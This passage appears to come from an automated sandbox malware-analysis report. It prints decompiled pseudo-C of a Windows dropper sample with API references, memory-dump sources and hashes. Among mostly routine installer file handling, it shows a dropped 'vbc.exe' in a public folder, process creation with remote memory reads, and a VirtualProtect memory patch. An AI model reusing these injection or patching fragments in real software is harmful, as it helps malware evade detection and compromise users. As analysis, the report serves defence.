                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2987980305-0
                                                                                                                                                                                                          • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                                                                                                                                          • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                          			E004015BB(char __ebx, void* __eflags) {
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				int _t19;
                                                                                                                                                                                                          				char _t21;
                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                          				char _t23;
                                                                                                                                                                                                          				signed char _t24;
                                                                                                                                                                                                          				char _t26;
                                                                                                                                                                                                          				CHAR* _t28;
                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t26 = __ebx;
                                                                                                                                                                                                          				_t28 = E00402BCE(0xfffffff0);
                                                                                                                                                                                                          				_t13 = E00405C7E(_t28);
                                                                                                                                                                                                          				_t30 = _t13;
                                                                                                                                                                                                          				if(_t13 != __ebx) {
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t32 = E00405C10(_t30, 0x5c);
                                                                                                                                                                                                          						_t21 =  *_t32;
                                                                                                                                                                                                          						 *_t32 = _t26;
                                                                                                                                                                                                          						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                                                                                                                          						if(_t21 != _t26) {
                                                                                                                                                                                                          							L5:
                                                                                                                                                                                                          							_t22 = E004058B7(_t28);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t22 = E0040583A(_t28); // executed
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t22 != _t26) {
                                                                                                                                                                                                          							if(_t22 != 0xb7) {
                                                                                                                                                                                                          								L9:
                                                                                                                                                                                                          								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                                                                                                                          								if((_t24 & 0x00000010) == 0) {
                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                                                                                                                          						 *_t32 = _t23;
                                                                                                                                                                                                          						_t30 = _t32 + 1;
                                                                                                                                                                                                          					} while (_t23 != _t26);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                                                                                                                          					_push(0xfffffff5);
                                                                                                                                                                                                          					E00401423();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E00401423(0xffffffe6);
                                                                                                                                                                                                          					E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
                                                                                                                                                                                                          					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                                                                                                                          					if(_t19 == 0) {
                                                                                                                                                                                                          						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}














                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(?), ref: 00405C8C
                                                                                                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                                            • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                          • API String ID: 1892508949-2935972921
                                                                                                                                                                                                          • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                                                                                                                                          • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessW.KERNEL32(?,00000000), ref: 722F337D
                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 722F33C4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CreateMemoryRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2726527582-0
                                                                                                                                                                                                          • Opcode ID: 336b3eaefdafa4c325ec6c7ec43c8978254d40ff6472ec0be642d855be60ce94
                                                                                                                                                                                                          • Instruction ID: 636f72560d9ffe208ff8805335adc39afe28c427f475bc4384b6161768230fa6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 336b3eaefdafa4c325ec6c7ec43c8978254d40ff6472ec0be642d855be60ce94
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95323671E54249AEEB10CFA8DC45FADFBB5BF08704F10409AE609FA2A4D7749A80CF15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                          			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                          				long _t22;
                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                          				long _t32;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = _a4;
                                                                                                                                                                                                          				if(_t21 >= 0) {
                                                                                                                                                                                                          					_t32 = _t21 +  *0x42f4b8;
                                                                                                                                                                                                          					 *0x429464 = _t32;
                                                                                                                                                                                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t22 = E004032BF(4);
                                                                                                                                                                                                          				if(_t22 >= 0) {
                                                                                                                                                                                                          					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
                                                                                                                                                                                                          					if(_t24 == 0) {
                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                          						_push(0xfffffffd);
                                                                                                                                                                                                          						goto L19;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *0x429464 =  *0x429464 + 4;
                                                                                                                                                                                                          						_t36 = E004032BF(_a4);
                                                                                                                                                                                                          						if(_t36 < 0) {
                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                          							_t22 = _t36;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if(_a12 != 0) {
                                                                                                                                                                                                          								_t26 = _a4;
                                                                                                                                                                                                          								if(_t26 >= _a16) {
                                                                                                                                                                                                          									_t26 = _a16;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                                                                                                          								if(_t27 != 0) {
                                                                                                                                                                                                          									_t36 = _v8;
                                                                                                                                                                                                          									 *0x429464 =  *0x429464 + _t36;
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(_a4 <= 0) {
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										_t28 = _a4;
                                                                                                                                                                                                          										if(_a4 >= 0x4000) {
                                                                                                                                                                                                          											_t28 = 0x4000;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v8 = _t28;
                                                                                                                                                                                                          										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
                                                                                                                                                                                                          											goto L18;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
                                                                                                                                                                                                          										if(_t30 == 0) {
                                                                                                                                                                                                          											_push(0xfffffffe);
                                                                                                                                                                                                          											L19:
                                                                                                                                                                                                          											_pop(_t22);
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t31 = _v8;
                                                                                                                                                                                                          											_a4 = _a4 - _t31;
                                                                                                                                                                                                          											 *0x429464 =  *0x429464 + _t31;
                                                                                                                                                                                                          											_t36 = _t36 + _t31;
                                                                                                                                                                                                          											if(_a4 > 0) {
                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L21;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L22;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L22:
                                                                                                                                                                                                          				return _t22;
                                                                                                                                                                                                          			}















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                          • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                                                                                                                                          • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                                          			E00401389(signed int _a4) {
                                                                                                                                                                                                          				intOrPtr* _t6;
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                          				signed int _t17;
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t17 = _a4;
                                                                                                                                                                                                          				while(_t17 >= 0) {
                                                                                                                                                                                                          					_t6 = _t17 * 0x1c +  *0x42f490;
                                                                                                                                                                                                          					if( *_t6 == 1) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(_t6); // executed
                                                                                                                                                                                                          					_t8 = E00401434(); // executed
                                                                                                                                                                                                          					if(_t8 == 0x7fffffff) {
                                                                                                                                                                                                          						return 0x7fffffff;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t10 = E0040136D(_t8);
                                                                                                                                                                                                          					if(_t10 != 0) {
                                                                                                                                                                                                          						_t11 = _t10 - 1;
                                                                                                                                                                                                          						_t16 = _t17;
                                                                                                                                                                                                          						_t17 = _t11;
                                                                                                                                                                                                          						_t12 = _t11 - _t16;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t12 = _t10 + 1;
                                                                                                                                                                                                          						_t17 = _t17 + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                                                                                                          						 *0x42ec2c =  *0x42ec2c + _t12;
                                                                                                                                                                                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                                                                                                                                          • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00406656(signed int _a4) {
                                                                                                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                                                                                                          				signed int _t10;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t10 = _a4 << 3;
                                                                                                                                                                                                          				_t8 =  *(_t10 + 0x40a258);
                                                                                                                                                                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                                                                                                                                                                          				if(_t5 != 0) {
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t5 = E004065E8(_t8); // executed
                                                                                                                                                                                                          				if(_t5 == 0) {
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,004034F9,0000000B), ref: 00406683
                                                                                                                                                                                                            • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                                                                                                                                            • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                                                                                                                                            • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                          • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                                                                                                                                          • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                          			E00405DE6(CHAR* _a4, long _a8, long _a12) {
                                                                                                                                                                                                          				signed int _t5;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                                                          				asm("sbb ecx, ecx");
                                                                                                                                                                                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                                                                          				return _t6;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DEA
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405DC1(CHAR* _a4) {
                                                                                                                                                                                                          				signed char _t3;
                                                                                                                                                                                                          				signed char _t7;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                                                          				_t7 = _t3;
                                                                                                                                                                                                          				if(_t7 != 0xffffffff) {
                                                                                                                                                                                                          					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004058B7(CHAR* _a4) {
                                                                                                                                                                                                          				int _t2;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                                                                          				if(_t2 == 0) {
                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405E5E(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t11 = _a12;
                                                                                                                                                                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E72
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405E8D(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t11 = _a12;
                                                                                                                                                                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405EA1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                          • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *0x72e34038 = _a4;
                                                                                                                                                                                                          				if(_a8 == 1) {
                                                                                                                                                                                                          					VirtualProtect(0x72e3404c, 4, 0x40, 0x72e3403c); // executed
                                                                                                                                                                                                          					 *0x72e3404c = 0xc2;
